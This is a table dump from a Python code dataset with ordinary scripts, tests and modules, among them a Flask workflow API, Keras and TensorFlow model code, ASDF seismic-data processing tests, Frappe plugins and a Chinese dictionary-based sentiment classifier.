| content (stringlengths 0–1.05M) | origin (stringclasses, 2 values) | type (stringclasses, 2 values) |
|---|---|---|
from Jumpscale import j
def test():
"""
to run:
kosmos 'j.data.rivine.test(name="sia_basic")'
"""
e = j.data.rivine.encoder_sia_get()
    # you can add integers, booleans, iterable objects, strings,
    # bytes and byte arrays. Dictionaries and objects are not supported.
e.add(False)
e.add("a")
e.add([1, True, "foo"])
e.add(b"123")
# the result is a single bytearray
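    # Decoding the expected bytes below: a boolean is one byte, strings and
    # byte slices carry an 8-byte little-endian length prefix, integers are
    # encoded as 8-byte little-endian values, and a list is its length prefix
    # followed by each encoded element.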
assert (
e.data
== b"\x00\x01\x00\x00\x00\x00\x00\x00\x00a\x03\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00foo\x03\x00\x00\x00\x00\x00\x00\x00123"
)
|
nilq/baby-python
|
python
|
from nose.tools import raises
from ..app import address_parts
@raises(TypeError)
def test_address_parts_no_address():
expected = []
actual = address_parts()
def test_address_parts_with_address():
expected = ['AddressNumber', 'StreetName']
actual = address_parts('123 main')
assert actual == expected
|
nilq/baby-python
|
python
|
from sys import exit
def parse_weights(numberExpectedParams, filename):
    f = open(filename, 'r')
    contents = f.readlines()
    f.close()
    params = []
    linenumber = 0
    for i in contents:
        linenumber = linenumber + 1
        i = i.strip()
        if i == "":
            continue
        try:
            paramVal = float(i)
            params.append(paramVal)
        except ValueError:
            print("While reading the parameter file (%s), expected a real number on line %d, but found '%s'. Please check." % (filename, linenumber, i))
            exit()
    if len(params) != numberExpectedParams:
        print("Incorrect number of weights in the given file! Found %d weights, but your controller uses %d" % (len(params), numberExpectedParams))
        exit()
    print("Successfully read %d weights: %s" % (numberExpectedParams, params))
    return params
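# A minimal usage sketch (my addition; 'weights.txt' is a hypothetical file
# holding one real number per line, blank lines allowed):
if __name__ == '__main__':
    weights = parse_weights(3, 'weights.txt')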
|
nilq/baby-python
|
python
|
from flask import current_app as app
from flask import jsonify, request
from director.api import api_bp
from director.builder import WorkflowBuilder
from director.exceptions import WorkflowNotFound
from director.extensions import cel_workflows, schema
from director.models.workflows import Workflow
@api_bp.route("/workflows", methods=["POST"])
@schema.validate(
{
"required": ["project", "name", "payload"],
"additionalProperties": False,
"properties": {
"project": {"type": "string"},
"name": {"type": "string"},
"payload": {"type": "object"},
},
}
)
def create_workflow():
data = request.get_json()
project = data["project"]
name = data["name"]
fullname = f"{project}.{name}"
# Check if the workflow exists
try:
cel_workflows.get_by_name(fullname)
except WorkflowNotFound:
return jsonify({"error": f"Workflow {fullname} not found"}), 404
# Create the workflow in DB
obj = Workflow(project=project, name=name, payload=data["payload"])
obj.save()
# Build the workflow and execute it
data = obj.to_dict()
workflow = WorkflowBuilder(obj.id)
workflow.run()
    app.logger.info(f"Workflow ready: {workflow.canvas}")
return jsonify(data), 201
@api_bp.route("/workflows")
def list_workflows():
workflows = Workflow.query.all()
return jsonify([w.to_dict() for w in workflows])
@api_bp.route("/workflows/<workflow_id>")
def get_workflow(workflow_id):
workflow = Workflow.query.filter_by(id=workflow_id).first()
if not workflow:
return jsonify({"error": f"Workflow {workflow_id} not found"}), 404
tasks = [t.to_dict() for t in workflow.tasks]
resp = workflow.to_dict()
resp.update({"tasks": tasks})
return jsonify(resp)
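# Example request against the create endpoint (my addition; the host and the
# project/name values are hypothetical and must name a workflow registered in
# cel_workflows):
#   curl -X POST http://localhost:8000/workflows \
#        -H 'Content-Type: application/json' \
#        -d '{"project": "demo", "name": "example", "payload": {}}'
# A successful call returns 201 with the stored workflow; an unknown
# project.name combination returns 404.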
|
nilq/baby-python
|
python
|
nome = input('Enter your name:')
if nome == 'Cristiano':
    print("It's me")
else:
    print("It's not me")
|
nilq/baby-python
|
python
|
from django.db import models
from bitoptions import BitOptions, BitOptionsField
TOPPINGS = BitOptions(
('pepperoni', 'mushrooms', 'onions', 'sausage', 'bacon', 'black olives',
'green olives', 'green peppers', 'pineapple', 'spinach', 'tomatoes',
'broccoli', 'jalapeno peppers', 'anchovies', 'chicken', 'beef', 'ham',
'salami')
)
CHEESES = BitOptions(('feta', 'parmesan', 'provolone', 'goat', 'mozzarella'))
COLORS = BitOptions(('red', 'green', 'blue'))
class Box(models.Model):
"""
Test model with nullable BitOptionsField.
"""
colors = BitOptionsField(options=COLORS, null=True, blank=True)
class Pizza(models.Model):
"""
Test model with small and medium size list of options.
"""
toppings = BitOptionsField(options=TOPPINGS)
cheeses = BitOptionsField(options=CHEESES)
|
nilq/baby-python
|
python
|
print(["ABC","ARC","AGC"][int(input())//50+8>>5])
|
nilq/baby-python
|
python
|
from __future__ import print_function
import sys
if sys.version_info < (3, 8):
print(file=sys.stderr)
print('This game needs Python 3.8 or later; preferably 3.9.', file=sys.stderr)
exit(1)
try:
import moderngl
import pyglet
import png
except ImportError:
print(file=sys.stderr)
print('You need to install dependencies for this game:', file=sys.stderr)
print(file=sys.stderr)
print(' python -m pip install -r requirements.txt', file=sys.stderr)
print(file=sys.stderr)
exit(1)
import keypad_racer.__main__
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
#Dasporal
import swiftclient
import os, sys, mimetypes
import requests
import json
import pprint
data = open(os.path.join(sys.path[0], "../tokens.json"))
tokens = json.load(data)
if len(sys.argv) not in (2, 3):
    print("Usage: podcast_upload.py [audio file name]")
    exit(1)
# Fetching infos on the file path
file_path = os.path.abspath(sys.argv[1])
file_name = os.path.basename(sys.argv[1])
# Opening file
try:
    episode = open(file_path, 'rb')
except IOError:
print ("File ", file_path, " not found.")
exit(1)
# Uploading to Mixcloud
print ("Uploading of ", file_name, " on Mixcloud started...")
# Filling the requests parameters
files = {"mp3": episode}
url = "https://api.mixcloud.com/upload/"
params = {"access_token": tokens["mixcloud"]["test_token"]}
data = {"name": "Test API"}
# API request
r = requests.post(url, data=data, params=params, files=files)
# Error handling
if (r.status_code == 200):
print ("Upload to Mixcloud succeeded!")
else:
print ("Upload to Mixcloud failed with error code ", str(r.status_code), " (", r.reason, ")")
exit(1)
# OpenStack
# Setting options
options = {}
options['tenant_id'] = tokens["openstack"]["tenant_id"]
options['region_name'] = tokens["openstack"]["region_name"]
# Opening connection
client = swiftclient.client.Connection(tokens["openstack"]["auth_url"], tokens["openstack"]["username"], tokens["openstack"]["password"], 5, None, None, False, 1, 64, tokens["openstack"]["tenant_name"], options, '2')
# Getting infos on the file
episode_size = os.stat(file_path).st_size
episode_content = episode.read(episode_size)
# Uploading
print ("Uploading of ", file_name, " on OpenStack started...")
try:
client.put_object("podcasts", file_name, episode_content, episode_size, None, None, "audio/mpeg")
except swiftclient.exceptions.ClientException as e:
print ("Error: Server responded to the PUT request on ", e.http_path, " with ", str(e.http_status), " ", e.http_reason)
exit(1)
print ("Upload to OpenStack succeeded!")
|
nilq/baby-python
|
python
|
DEFAULT_USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
SPECIAL_CASES = {
'ee': 'et',
}
LANGUAGES = {
'af': 'afrikaans',
'sq': 'albanian',
'ar': 'arabic',
'be': 'belarusian',
'bg': 'bulgarian',
'ca': 'catalan',
'zh-CN': 'chinese_simplified',
'zh-TW': 'chinese_traditional',
'hr': 'croatian',
'cs': 'czech',
'da': 'danish',
'nl': 'dutch',
'en': 'english',
'eo': 'esperanto',
'et': 'estonian',
'tl': 'filipino',
'fi': 'finnish',
'fr': 'french',
'gl': 'galician',
'de': 'german',
'el': 'greek',
'iw': 'hebrew',
'hi': 'hindi',
'hu': 'hungarian',
'is': 'icelandic',
'id': 'indonesian',
'ga': 'irish',
'it': 'italian',
'ja': 'japanese',
'ko': 'korean',
'la': 'latin',
'lv': 'latvian',
'lt': 'lithuanian',
'mk': 'macedonian',
'ms': 'malay',
'mt': 'maltese',
'no': 'norwegian',
'fa': 'persian',
'pl': 'polish',
'pt': 'portuguese',
'ro': 'romanian',
'ru': 'russian',
'sr': 'serbian',
'sk': 'slovak',
'sl': 'slovenian',
'es': 'spanish',
'sw': 'swahili',
'sv': 'swedish',
'th': 'thai',
'tr': 'turkish',
'uk': 'ukrainian',
'vi': 'vietnamese',
'cy': 'welsh',
'yi': 'yiddish',
}
|
nilq/baby-python
|
python
|
from keras.engine import InputSpec
from keras.layers import Dense
from keras.layers.wrappers import Wrapper, TimeDistributed
class Highway(Wrapper):
def __init__(self, layer, gate=None, **kwargs):
self.supports_masking = True
self.gate = gate
super(Highway, self).__init__(layer, **kwargs)
def build(self, input_shape=None):
assert len(input_shape) in [2, 3]
self.input_spec = [InputSpec(shape=input_shape)]
nb_output_dims = input_shape[-1]
if self.gate is None:
gate = Dense(nb_output_dims, activation='sigmoid')
if len(input_shape) == 3:
gate = TimeDistributed(gate)
self.gate = gate
super(Highway, self).build(input_shape)
def get_output_shape_for(self, input_shape):
assert self.layer.get_output_shape_for(input_shape) == input_shape
assert self.gate.get_output_shape_for(input_shape) == input_shape
return input_shape
    def call(self, x, mask=None):
        gated = self.gate(x)
        return self.layer(x) * gated + x * (1 - gated)
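# A minimal usage sketch (my addition, assuming the Keras 1.x functional API
# that `get_output_shape_for` implies). The wrapped layer must preserve the
# input shape so the residual term `x * (1 - gate)` is well-defined.
def _highway_demo():
    from keras.layers import Input
    from keras.models import Model
    inp = Input(shape=(64,))
    out = Highway(Dense(64, activation='relu'))(inp)
    return Model(input=inp, output=out)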
|
nilq/baby-python
|
python
|
import tensorflow as tf
import tqdm
from one_shot_learning_network import MatchingNetwork
class ExperimentBuilder:
def __init__(self, data):
"""
Initializes an ExperimentBuilder object. The ExperimentBuilder object takes care of setting up our experiment
        and provides helper functions such as run_training_epoch and run_validation_epoch to simplify our training
and evaluation procedures.
:param data: A data provider class
"""
self.data = data
def build_experiment(self, batch_size, classes_per_set, samples_per_class, fce):
"""
:param batch_size: The experiment batch size
:param classes_per_set: An integer indicating the number of classes per support set
:param samples_per_class: An integer indicating the number of samples per class
:param fce: Whether to use full context embeddings or not
:return: a matching_network object, along with the losses, the training ops and the init op
"""
height, width, channels = self.data.x.shape[2], self.data.x.shape[3], self.data.x.shape[4]
self.support_set_images = tf.placeholder(tf.float32, [batch_size, classes_per_set, samples_per_class, height, width,
channels], 'support_set_images')
self.support_set_labels = tf.placeholder(tf.int32, [batch_size, classes_per_set, samples_per_class], 'support_set_labels')
self.target_image = tf.placeholder(tf.float32, [batch_size, height, width, channels], 'target_image')
self.target_label = tf.placeholder(tf.int32, [batch_size], 'target_label')
self.training_phase = tf.placeholder(tf.bool, name='training-flag')
self.rotate_flag = tf.placeholder(tf.bool, name='rotate-flag')
self.keep_prob = tf.placeholder(tf.float32, name='dropout-prob')
self.current_learning_rate = 1e-03
self.learning_rate = tf.placeholder(tf.float32, name='learning-rate-set')
self.one_shot_omniglot = MatchingNetwork(batch_size=batch_size, support_set_images=self.support_set_images,
support_set_labels=self.support_set_labels,
target_image=self.target_image, target_label=self.target_label,
keep_prob=self.keep_prob, num_channels=channels,
is_training=self.training_phase, fce=fce, rotate_flag=self.rotate_flag,
num_classes_per_set=classes_per_set,
num_samples_per_class=samples_per_class, learning_rate=self.learning_rate)
summary, self.losses, self.c_error_opt_op = self.one_shot_omniglot.init_train()
init = tf.global_variables_initializer()
self.total_train_iter = 0
return self.one_shot_omniglot, self.losses, self.c_error_opt_op, init
def run_training_epoch(self, total_train_batches, sess):
"""
Runs one training epoch
:param total_train_batches: Number of batches to train on
:param sess: Session object
:return: mean_training_categorical_crossentropy_loss and mean_training_accuracy
"""
total_c_loss = 0.
total_accuracy = 0.
with tqdm.tqdm(total=total_train_batches) as pbar:
for i in range(total_train_batches): # train epoch
x_support_set, y_support_set, x_target, y_target = self.data.get_train_batch(augment=True)
_, c_loss_value, acc = sess.run(
[self.c_error_opt_op, self.losses[self.one_shot_omniglot.classify], self.losses[self.one_shot_omniglot.dn]],
feed_dict={self.keep_prob: 1.0, self.support_set_images: x_support_set,
self.support_set_labels: y_support_set, self.target_image: x_target, self.target_label: y_target,
self.training_phase: True, self.rotate_flag: False, self.learning_rate: self.current_learning_rate})
iter_out = "train_loss: {}, train_accuracy: {}".format(c_loss_value, acc)
pbar.set_description(iter_out)
pbar.update(1)
total_c_loss += c_loss_value
total_accuracy += acc
self.total_train_iter += 1
if self.total_train_iter % 2000 == 0:
self.current_learning_rate /= 2
print("change learning rate", self.current_learning_rate)
total_c_loss = total_c_loss / total_train_batches
total_accuracy = total_accuracy / total_train_batches
return total_c_loss, total_accuracy
def run_validation_epoch(self, total_val_batches, sess):
"""
Runs one validation epoch
:param total_val_batches: Number of batches to train on
:param sess: Session object
:return: mean_validation_categorical_crossentropy_loss and mean_validation_accuracy
"""
total_val_c_loss = 0.
total_val_accuracy = 0.
with tqdm.tqdm(total=total_val_batches) as pbar:
for i in range(total_val_batches): # validation epoch
x_support_set, y_support_set, x_target, y_target = self.data.get_val_batch(augment=True)
c_loss_value, acc = sess.run(
[self.losses[self.one_shot_omniglot.classify], self.losses[self.one_shot_omniglot.dn]],
feed_dict={self.keep_prob: 1.0, self.support_set_images: x_support_set,
self.support_set_labels: y_support_set, self.target_image: x_target, self.target_label: y_target,
self.training_phase: False, self.rotate_flag: False})
iter_out = "val_loss: {}, val_accuracy: {}".format(c_loss_value, acc)
pbar.set_description(iter_out)
pbar.update(1)
total_val_c_loss += c_loss_value
total_val_accuracy += acc
total_val_c_loss = total_val_c_loss / total_val_batches
total_val_accuracy = total_val_accuracy / total_val_batches
return total_val_c_loss, total_val_accuracy
def run_testing_epoch(self, total_test_batches, sess):
"""
Runs one testing epoch
:param total_test_batches: Number of batches to train on
:param sess: Session object
:return: mean_testing_categorical_crossentropy_loss and mean_testing_accuracy
"""
total_test_c_loss = 0.
total_test_accuracy = 0.
with tqdm.tqdm(total=total_test_batches) as pbar:
for i in range(total_test_batches):
x_support_set, y_support_set, x_target, y_target = self.data.get_test_batch(augment=True)
c_loss_value, acc = sess.run(
[self.losses[self.one_shot_omniglot.classify], self.losses[self.one_shot_omniglot.dn]],
feed_dict={self.keep_prob: 1.0, self.support_set_images: x_support_set,
self.support_set_labels: y_support_set, self.target_image: x_target,
self.target_label: y_target,
self.training_phase: False, self.rotate_flag: False})
iter_out = "test_loss: {}, test_accuracy: {}".format(c_loss_value, acc)
pbar.set_description(iter_out)
pbar.update(1)
total_test_c_loss += c_loss_value
total_test_accuracy += acc
total_test_c_loss = total_test_c_loss / total_test_batches
total_test_accuracy = total_test_accuracy / total_test_batches
return total_test_c_loss, total_test_accuracy
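# A minimal driver sketch (my addition; the data provider and the epoch/batch
# counts are assumptions, not part of the original file). It shows the
# intended call order: build the graph once, initialize variables, then loop.
def _run_experiment(data, total_epochs=10, total_train_batches=100):
    experiment = ExperimentBuilder(data)
    _, losses, train_op, init = experiment.build_experiment(
        batch_size=32, classes_per_set=5, samples_per_class=1, fce=True)
    with tf.Session() as sess:
        sess.run(init)
        for epoch in range(total_epochs):
            loss, acc = experiment.run_training_epoch(total_train_batches, sess)
            print("epoch {}: loss={}, acc={}".format(epoch, loss, acc))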
|
nilq/baby-python
|
python
|
from __future__ import annotations
from typing import TYPE_CHECKING
from os import chdir, path
from asdfy import ASDFProcessor, ASDFAccessor
if TYPE_CHECKING:
from obspy import Trace, Stream
if not path.exists('traces.h5') and path.exists('tests/traces.h5'):
chdir('tests')
def func1(stream: Stream):
# save waveform by returning a Stream
return stream
def func2(acc: ASDFAccessor):
    # save waveform by returning a dict mapping channel -> Trace
    assert acc.fellows and len(acc.fellows) == 9, 'incorrect station number'
for acc2 in acc.fellows:
assert acc2.component == acc.component
assert acc2.ds is acc.ds
output = {}
for trace in acc.stream:
output[trace.stats.channel] = trace
return output
def func3(trace: Trace):
trace.filter('lowpass', freq=1/17)
# save waveform by returning a Trace
return trace
def func4(syn_acc, obs_acc):
syn = syn_acc.trace
obs = obs_acc.trace
data = syn.data - obs.data # type: ignore
stats = syn.stats
assert len(syn_acc.fellows) == 27, f'incorrect station number {len(syn_acc.fellows)}'
assert len(obs_acc.fellows) == 27, f'incorrect station number {len(obs_acc.fellows)}'
for acc in syn_acc.fellows:
assert acc.ds is syn_acc.ds
for acc in obs_acc.fellows:
assert acc.ds is obs_acc.ds
# save as auxiliary data by returning a tuple
return data, {
'misfit': data.std(),
'network': stats.network,
'station': stats.station,
'component': stats.component}
def func5(acc):
from asdfy import ASDFAuxiliary
# save as auxiliary data by returning namedtuple `ASDFAuxiliary`
return ASDFAuxiliary(acc.data, acc.auxiliary.parameters)
def func6(aux_group):
from obspy import Trace, Stream
# save waveform by returning a Trace
traces = []
for cha, aux in aux_group.items():
assert cha[-1] == aux.parameters['component']
traces.append(Trace(aux.data, header=aux.parameters))
return Stream(traces)
def reset():
from subprocess import check_call
check_call('rm -f proc1.h5', shell=True)
check_call('rm -f proc2.h5', shell=True)
check_call('rm -f proc3.h5', shell=True)
check_call('rm -f proc4.h5', shell=True)
check_call('rm -f proc5.h5', shell=True)
check_call('rm -f proc6.h5', shell=True)
def verify():
from numpy.linalg import norm
from pyasdf import ASDFDataSet
with ASDFDataSet('proc1.h5', mode='r', mpi=False) as ds:
assert len(ds.events) == 1
assert hasattr(ds.waveforms['II.BFO'], 'StationXML')
with ASDFDataSet('proc6.h5', mode='r', mpi=False) as ds:
data_proc = ds.waveforms['II.BFO'].test[0].data # type: ignore
with ASDFDataSet('traces_proc.h5', mode='r', mpi=False) as ds:
data_ref = ds.waveforms['II.BFO'].test[0].data # type: ignore
assert norm(data_proc - data_ref) / norm(data_ref) < 1e-4
print('pass')
reset()
def verify_mpi():
from mpi4py.MPI import COMM_WORLD as comm
rank = comm.Get_rank()
if rank == 0:
verify()
def test():
from mpi4py.MPI import COMM_WORLD as comm
rank = comm.Get_rank()
if rank == 0:
reset()
# process stream data
ap = ASDFProcessor('traces.h5', 'proc1.h5', func1, input_type='stream', input_tag='synthetic')
if rank == 0:
print('test1: stream -> stream')
assert len(ap.access()) == 9
ap.run()
# process stream data with more info passed
if rank == 0:
print('test2: accessor -> stream')
ASDFProcessor('traces.h5', 'proc2.h5', func2, input_type='stream', accessor=True).run()
# process trace data
if rank == 0:
print('test3: trace -> trace')
ASDFProcessor('proc2.h5', 'proc3.h5', func3).run()
# process trace data (save with a different tag)
if rank == 0:
print('test4: (trace, trace) -> auxiliary')
ASDFProcessor(('proc1.h5', 'proc3.h5'), 'proc4.h5', func4, accessor=True, output_tag='test').run()
# process auxiliary data with more info passed
if rank == 0:
print('test5: accessor -> auxiliary')
ASDFProcessor('proc4.h5', 'proc5.h5', func5, input_type='auxiliary', accessor=True, input_tag='test').run()
# process auxiliary data
if rank == 0:
print('test6: auxiliary_group -> stream')
ASDFProcessor('proc5.h5', 'proc6.h5', func6, input_type='auxiliary_group').run()
if rank == 0:
verify()
if __name__ == '__main__':
test()
|
nilq/baby-python
|
python
|
import numpy as np
from starfish.core.expression_matrix.concatenate import concatenate
from starfish.core.expression_matrix.expression_matrix import ExpressionMatrix
from starfish.types import Features
def test_concatenate_two_expression_matrices():
a_data = np.array(
[[0, 1],
[1, 0]]
)
b_data = np.array(
[[0],
[1]]
)
dims = [Features.CELLS, Features.GENES]
a_coords = [(Features.CELLS, [0, 1]), (Features.GENES, ["x", "y"])]
b_coords = [(Features.CELLS, [0, 1]), (Features.GENES, ["x"])]
a = ExpressionMatrix(a_data, dims=dims, coords=a_coords)
b = ExpressionMatrix(b_data, dims=dims, coords=b_coords)
concatenated = concatenate([a, b])
expected = np.array(
[[0, 1],
[1, 0],
[0, np.nan],
[1, np.nan]]
)
np.testing.assert_equal(concatenated.values, expected)
|
nilq/baby-python
|
python
|
"""The plugin module implements various plugins to extend the behaviour
of community app.
The plugins provided by this module are:
SketchesTab - additional tab to show on the profile pages
LiveCodeExtension - injecting livecode css/js into lesson page
"""
import frappe
from community.plugins import PageExtension, ProfileTab
from community.widgets import Widgets
from .overrides import Sketch
class SketchesTab(ProfileTab):
def get_title(self):
return "Sketches"
def render(self):
sketches = Sketch.get_recent_sketches(owner=self.user.name, limit=16)
context = dict(sketches=sketches, widgets=Widgets())
return frappe.render_template(
"templates/profile/sketches.html",
context)
class LiveCodeExtension(PageExtension):
def render_header(self):
livecode_url = frappe.get_value("LMS Settings", None, "livecode_url")
context = {
"livecode_url": livecode_url
}
return frappe.render_template(
"templates/livecode/extension_header.html",
context)
def render_footer(self):
livecode_url = frappe.get_value("LMS Settings", None, "livecode_url")
context = {
"livecode_url": livecode_url
}
return frappe.render_template(
"templates/livecode/extension_footer.html",
context)
def exercise_renderer(argument):
exercise = frappe.get_doc("Exercise", argument)
context = dict(exercise=exercise)
return frappe.render_template("templates/exercise.html", context)
def image_renderer(argument):
"""Markdown macro for Image.
    Renders the image of an exercise.
    This is a hack to extend the already existing exercise infrastructure
to use for showing images. To distinguish between real exercises and
the exercises used for showing images, the latter ones are prefixed
with `image-`.
usage:
{{ Image("image-flag-of-germany") }}
"""
exercise = frappe.get_doc("Exercise", argument)
context = dict(exercise=exercise)
return frappe.render_template("templates/image.html", context)
def youtube_video_renderer(video_id):
return f"""
<iframe width="560" height="315"
src="https://www.youtube.com/embed/{video_id}"
title="YouTube video player"
frameborder="0"
allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
allowfullscreen>
</iframe>
"""
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
@description: Sentiment classifier
@author: XuMing
"""
import re
import jieba
from jieba import posseg
class DictClassifier:
def __init__(self):
self.__root_path = "data/dict/"
        jieba.load_userdict("data/dict/user.dict")  # custom user dictionary for word segmentation
        # sentiment dictionaries
self.__phrase_dict = self.__get_phrase_dict()
self.__positive_dict = self.__get_dict(self.__root_path + "positive_dict.txt")
self.__negative_dict = self.__get_dict(self.__root_path + "negative_dict.txt")
self.__conjunction_dict = self.__get_dict(self.__root_path + "conjunction_dict.txt")
self.__punctuation_dict = self.__get_dict(self.__root_path + "punctuation_dict.txt")
self.__adverb_dict = self.__get_dict(self.__root_path + "adverb_dict.txt")
self.__denial_dict = self.__get_dict(self.__root_path + "denial_dict.txt")
def classify(self, sentence):
return self.analyse_sentence(sentence)
def analysis_file(self, file_path_in, file_path_out, encoding='utf-8', print_show=False, start=0, end=-1):
results = []
with open(file_path_in, 'r', encoding=encoding) as f:
num_line = 0
for line in f:
                # start position in the corpus
                num_line += 1
                if num_line < start:
                    continue
                results.append(self.analyse_sentence(line.strip(), file_path_out, print_show))
                # end position in the corpus
                if 0 < end <= num_line:
                    break
return results
def analyse_sentence(self, sentence, run_out_file_path=None, print_show=False):
        # data structure holding the sentiment analysis result
        comment_analysis = {"score": 0}
        # split the comment into clauses
        clauses = self.__divide_sentence_to_clause(sentence + '%')
        # run sentiment analysis on each clause
        for i in range(len(clauses)):
            # analyse each clause into its own data structure
            sub_clause = self.__analyse_clause(clauses[i].replace("。", "."), run_out_file_path, print_show)
            # merge the clause result into the overall structure
            comment_analysis["sub-clause" + str(i)] = sub_clause
            comment_analysis["score"] += sub_clause["score"]
if run_out_file_path is not None:
            # write the whole sentence to the output file
self.__write_out_file(run_out_file_path, "\n" + sentence + "\n")
self.__output_analysis(comment_analysis, run_out_file_path)
self.__write_out_file(run_out_file_path, str(comment_analysis) + "\n\n")
if print_show:
print("\n" + sentence)
self.__output_analysis(comment_analysis)
print(comment_analysis)
if comment_analysis["score"] > 0:
return 1
else:
return 0
def __divide_sentence_to_clause(self, sentence):
clauses = self.__split_sentence(sentence)
clauses[-1] = clauses[-1][:-1]
return clauses
def __analyse_clause(self, clauses, run_out_file_path, print_show):
sub_clause = {"score": 0, "positive": [], "negative": [], "conjunction": [], "punctuation": [], "pattern": []}
seg_result = posseg.lcut(clauses)
        # write out the segmentation result
if run_out_file_path is not None:
self.__write_out_file(run_out_file_path, clauses + "\n")
self.__write_out_file(run_out_file_path, str(seg_result) + "\n")
if print_show:
print(clauses)
print(seg_result)
        # sentence pattern: 要的是...给的是... (asked for one thing, given another)
        judgement = self.__is_clause_pattern_if_good(clauses)
        if judgement != "":
            sub_clause["pattern"].append(judgement)
            sub_clause["score"] -= judgement["value"]
            return sub_clause
        # sentence pattern: 如果...就好了 (if only ... it would be good)
        judgement = self.__is_clause_pattern_is_not(clauses)
        if judgement != "":
            sub_clause["pattern"].append(judgement)
            sub_clause["score"] -= judgement["value"]
        # sentence pattern: phrase dictionary
judgement = self.__is_clause_pattern_phrase(clauses, seg_result)
if judgement != "":
sub_clause["score"] += judgement["score"]
if judgement["score"] >= 0:
sub_clause["positive"].append(judgement)
elif judgement["score"] < 0:
sub_clause["negative"].append(judgement)
match_result = judgement["key"].split(":")[-1]
i = 0
while i < len(seg_result):
if seg_result[i].word in match_result:
if i + 1 == len(seg_result) or seg_result[i + 1].word in match_result:
del (seg_result[i])
continue
i += 1
        # analyse the remaining words one by one
for i in range(len(seg_result)):
mark, result = self.__analyse_word(seg_result[i].word, seg_result, i)
if mark == 0:
continue
elif mark == 1:
sub_clause["conjunction"].append(result)
elif mark == 2:
sub_clause["punctuation"].append(result)
elif mark == 3:
sub_clause["positive"].append(result)
sub_clause["score"] += result["score"]
elif mark == 4:
sub_clause["negative"].append(result)
sub_clause["score"] -= result["score"]
        # apply the sentiment weight of conjunctions
for conj in sub_clause["conjunction"]:
sub_clause["score"] *= conj["value"]
        # apply the sentiment weight of punctuation
for punc in sub_clause["punctuation"]:
sub_clause["score"] *= punc["value"]
return sub_clause
@staticmethod
def __is_clause_pattern_if_good(clauses):
re_pattern = re.compile(r".*(要|选)的.+(送|给).*")
match = re_pattern.match(clauses)
if match is not None:
pattern = {"key": "要的是...给的是...", "value": 1}
return pattern
return ""
@staticmethod
def __is_clause_pattern_is_not(clauses):
re_pattern = re.compile(r".*(如果|要是|希望).+就[\u4e00-\u9fa5]+(好|完美)了")
match = re_pattern.match(clauses)
if match is not None:
pattern = {"key": "如果...就好了", "value": 1.0}
return pattern
return ""
def __is_clause_pattern_phrase(self, clauses, seg_result):
for phrase in self.__phrase_dict:
keys = phrase.keys()
to_compile = phrase["key"].replace("……", "[\u4e00-\u9fa5]*")
if "start" in keys:
to_compile = to_compile.replace("*", "{" + phrase["start"] + "," + phrase["end"] + "}")
if "head" in keys:
to_compile = phrase["head"] + to_compile
match = re.compile(to_compile).search(clauses)
if match is not None:
is_continue = True
pos = [flag for word, flag in posseg.cut(match.group())]
if "between_tag" in keys:
if phrase["between_tag"] not in pos and len(pos) > 2:
is_continue = False
if is_continue:
for i in range(len(seg_result)):
if seg_result[i].word in match.group():
try:
if seg_result[i + 1].word in match.group():
return self.__emotional_word_analysis(
phrase["key"] + ":" + match.group(), phrase["value"],
[x for x, y in seg_result], i)
except IndexError:
return self.__emotional_word_analysis(
phrase["key"] + ":" + match.group(), phrase["value"],
[x for x, y in seg_result], i)
return ""
def __emotional_word_analysis(self, core_word, value, segments, index):
        # the word is in a sentiment dictionary: build a result dict centred on it
orientation = {"key": core_word, "adverb": [], "denial": [], "value": value}
orientation_score = orientation["value"]
        # look back up to three words for negations and adverbs
view_window = index - 1
if view_window > -1:
            # is the previous word itself a sentiment word?
if segments[view_window] in self.__negative_dict or segments[view_window] in self.__positive_dict:
orientation["score"] = orientation_score
return orientation
            # is the previous word an adverb?
if segments[view_window] in self.__adverb_dict:
adverb = {"key": segments[view_window], "position": 1,
"value": self.__adverb_dict[segments[view_window]]}
orientation["adverb"].append(adverb)
orientation_score *= self.__adverb_dict[segments[view_window]]
            # is the previous word a negation?
elif segments[view_window] in self.__denial_dict:
denial = {"key": segments[view_window], "position": 1,
"value": self.__denial_dict[segments[view_window]]}
orientation["denial"].append(denial)
orientation_score *= -1
view_window = index - 2
if view_window > -1:
            # stop if the word before is itself a sentiment word
if segments[view_window] in self.__negative_dict or \
segments[view_window] in self.__positive_dict:
orientation['score'] = orientation_score
return orientation
if segments[view_window] in self.__adverb_dict:
adverb = {"key": segments[view_window], "position": 2,
"value": self.__adverb_dict[segments[view_window]]}
orientation_score *= self.__adverb_dict[segments[view_window]]
orientation["adverb"].insert(0, adverb)
elif segments[view_window] in self.__denial_dict:
denial = {"key": segments[view_window], "position": 2,
"value": self.__denial_dict[segments[view_window]]}
orientation["denial"].insert(0, denial)
orientation_score *= -1
            # check for the "不是很好" (not very good) structure, as opposed to "很不好" (very bad)
            if len(orientation["adverb"]) > 0:
                # if so, damp the score with a 0.3 factor
orientation_score *= 0.3
view_window = index - 3
if view_window > -1:
            # stop if the word before is itself a sentiment word
if segments[view_window] in self.__negative_dict or segments[view_window] in self.__positive_dict:
orientation['score'] = orientation_score
return orientation
if segments[view_window] in self.__adverb_dict:
adverb = {"key": segments[view_window], "position": 3,
"value": self.__adverb_dict[segments[view_window]]}
orientation_score *= self.__adverb_dict[segments[view_window]]
orientation["adverb"].insert(0, adverb)
elif segments[view_window] in self.__denial_dict:
denial = {"key": segments[view_window], "position": 3,
"value": self.__denial_dict[segments[view_window]]}
orientation["denial"].insert(0, denial)
orientation_score *= -1
            # again check for the "不是很好" (not very good) structure
if len(orientation["adverb"]) > 0 and len(orientation["denial"]) == 0:
orientation_score *= 0.3
        # record the final sentiment score
orientation['score'] = orientation_score
        # return the result structure
return orientation
def __analyse_word(self, word, seg_result=None, index=-1):
        # conjunction?
judgement = self.__is_word_conjunction(word)
if judgement != "":
return 1, judgement
        # punctuation?
judgement = self.__is_word_punctuation(word)
if judgement != "":
return 2, judgement
        # positive sentiment word?
judgement = self.__is_word_positive(word, seg_result, index)
if judgement != "":
return 3, judgement
        # negative sentiment word?
judgement = self.__is_word_negative(word, seg_result, index)
if judgement != "":
return 4, judgement
return 0, ""
def __is_word_conjunction(self, word):
if word in self.__conjunction_dict:
conjunction = {"key": word, "value": self.__conjunction_dict[word]}
return conjunction
return ""
